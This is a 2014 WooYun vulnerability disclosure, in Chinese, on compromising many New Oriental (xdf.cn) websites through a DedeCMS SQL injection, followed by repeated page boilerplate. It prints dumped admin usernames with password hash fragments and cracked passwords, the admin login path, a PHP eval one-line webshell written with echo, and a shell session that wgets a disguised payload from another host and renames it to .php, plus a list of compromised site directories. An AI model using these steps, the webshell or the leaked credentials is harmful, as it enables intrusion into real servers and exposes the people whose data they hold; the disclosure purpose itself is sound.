新东方一个未修复的漏洞可导致N个站点沦陷

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054133

漏洞标题：新东方一个未修复的漏洞可导致N个站点沦陷

漏洞作者： U神

提交时间：2014-03-21 15:37

修复时间：2014-05-05 15:37

公开时间：2014-05-05 15:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-21：细节已通知厂商并且等待厂商处理中
2014-03-24：厂商已经确认，细节仅向厂商公开
2014-04-03：细节向核心白帽子及相关领域专家公开
2014-04-13：细节向普通白帽子公开
2014-04-23：细节向实习白帽子公开
2014-05-05：细节向公众公开

简要描述：

详细说明：

#1.某日新东方一个漏洞对我公开了，于是测试了根本就没去修复，然后我就打算看看能不能拿下Shell，这个漏洞是dedecms的最新注入，注入出帐号密码了，整理了一下，发现居然密码123456的达到那么的多！看来你们很不注重安全！

http://www.maxen.com.cn/------------>>  MaxEn|4e80a008e7b9129a330a   无解
http://www.maxen.com.cn/------------>>  zhibo|ca8173d47fbf2c6dc052   zhiboccw
http://www.maxen.com.cn/------------>>  nicole|c3949ba59abbe56e057f  123456
http://www.maxen.com.cn/------------>>  jiaoxue|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  bjmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  tjmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  symaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  cdmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  cqmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  gzmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  aditor|c3949ba59abbe56e057f 123456

通过扫描器得到了后台地址就是：

http://www.maxen.com.cn/dedecms/login.php

成功进入后台如下，使用了第三个帐号权限比较大！

然后通过文件管理器成功得到shell，shell地址：

http://www.maxen.com.cn/plus/show.php

如下图：

#2.可是这个shell的访问目录有权限的，所以无法直接在菜刀上访问其它的目录，如下图：

然后我就在想Web这个目录下应该还有网站，于是通过菜刀的终端管理，使用cd命令成功切换到web目录，再使用dir或者ls命令发现了特别多的网站！最少有30多个！当时就震惊了~

然后我随便切换到了目录“book.xdf.cn”通过"ls -l"命令发现都有写入权限，这下好了~可以写shell了，于是我本来通过echo一句话到该目录下发现提示错误，

echo "<?php eval ($_POST[val]); ?>" >>c.php

如下：

为什么会这样？我不太懂Linux命令，但是我"echo test >c.php"却可以成功写入文件。

#3.最后我想到用wget命令去下载，但是该把PHP的shell放哪里来下载呢？最后我想了一下！有办法了！就放到http://www.maxen.com.cn网站下去，于是在plus下放了一个PHP文件，后来发现！不对！这个网站会解析PHP，下载下来的只能当html来显示了！怎么办？最后想到了一个聪明的办法，先在本地建立了一个文件，写入一句话木马，然后将后缀名改为.rar的压缩包，传到该plus下目录。

#4.我们的思路就是先把u.rar下载下来，这样就不会被解析了，然后通过重命名命令来将u.rar命名为u.php。先随便找了一个网站，就拿“http://answer2014.xdf.cn/”站点来说吧，通过下面几条命令成功下载下shell。

[/neworiental/web/answer2014.xdf.cn/wwwroot/upload/]$ wget http://maxen.com.cn/plus/u.rar
--2014-03-20 19:30:51--  http://maxen.com.cn/plus/u.rar
Resolving maxen.com.cn... 116.213.70.29
Connecting to maxen.com.cn|116.213.70.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 62 [application/x-rar-compressed]
Saving to: `u.rar'
     0K                                                       100% 8.45M=0s
2014-03-20 19:30:51 (8.45 MB/s) - `u.rar' saved [62/62]
[/neworiental/web/answer2014.xdf.cn/wwwroot/upload/]$ dir
blog  u.rar
[/neworiental/web/answer2014.xdf.cn/wwwroot/upload/]$ mv u.rar u.php
[/neworiental/web/answer2014.xdf.cn/wwwroot/upload/]$ dir
blog  u.php

漏洞证明：

#4.最后连接该shell，成功进去了，开始我以为要每个网站都写入一遍，最后发现这个网站居然有权限跨目录！

N个站点沦陷：

10zn.sz.xdf.cn		    hanjia.xdf.cn	      qiuji.xdf.cn
answer2014.xdf.cn	    kaixue.xdf.cn	      search.xdf.cn
axure.test.xdf.cn	    kouyudasai.xdf.cn	      t.xdf.cn
baby.xdf.cn		    maxen.com.cn	      test.woxue.com
baby.xdf.cn-old		    misc.xdf.cn		      tuan.xdf.cn
bjtf.xdf.cn		    new			      ued.xdf.cn
book.xdf.cn		    nginx_cache		      vipwx.xdf.cn
cakephp1.3		    paike.xdf.cn	      whhuodong.xdf.cn
choujiang		    post.xdf.cn		      www
choujiang.gz.xdf.cn	    proxy.fos.xdf.cn	      www.toefljunior.com.cn
college.xdf.cn		    proxy.heb.xdf.cn	      xdf.oeeee.com
college2		    proxy.jn.xdf.cn	      xueba.xdf.cn
eaccelerator_cache	    proxy.kaoyan.xdf.cn       ying.xdf.cn
forum.toefljuniorchina.com  proxy.szchoujiang.xdf.cn  yqlj.xdf.cn
gdxmwx.xdf.cn		    proxy.xwb.pop.xdf.cn      yubook.xdf.cn

提取下来服务器就可以被控制，服务器上有很多重要信息吧！

为了证明给审核员看其它网站都有写入权限，测试了两个网站~如下证明（请记得删除）：

http://baby.xdf.cn/test.php
http://qiuji.xdf.cn/wooyun.txt

各种数据库，可以连很多很多不同的数据库，我就不列举了~有几个有N多会员数据的~

修复方案：

PS：数据库神马的没动，文件神马的没有下载过！包括服务器都没提权，太菜了没办法！只是尝试连接了一两个数据库证明危害性，以上提到的shell地址包括测试的文件请自行删除，为的是防止运维人员再次偷懒！其它什么东西没动，切勿跨省！我是一个有道德意识的白帽子！还有我想说我好像在几个网站看到了别人的shell，请运维人员花时间去看看吧~查杀一下整站！最后想说，求一个高分rank，谢谢！

版权声明：转载请注明来源 U神@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-03-24 11:42

厂商回复：

谢谢提供消息，我们会尽快确认并修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054133

漏洞标题：新东方一个未修复的漏洞可导致N个站点沦陷

相关厂商：新东方

漏洞作者： U神

提交时间：2014-03-21 15:37

修复时间：2014-05-05 15:37

公开时间：2014-05-05 15:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 U神@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054133

漏洞标题：新东方一个未修复的漏洞可导致N个站点沦陷

相关厂商：新东方

漏洞作者： U神

提交时间：2014-03-21 15:37

修复时间：2014-05-05 15:37

公开时间：2014-05-05 15:37

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-054133"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 U神@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：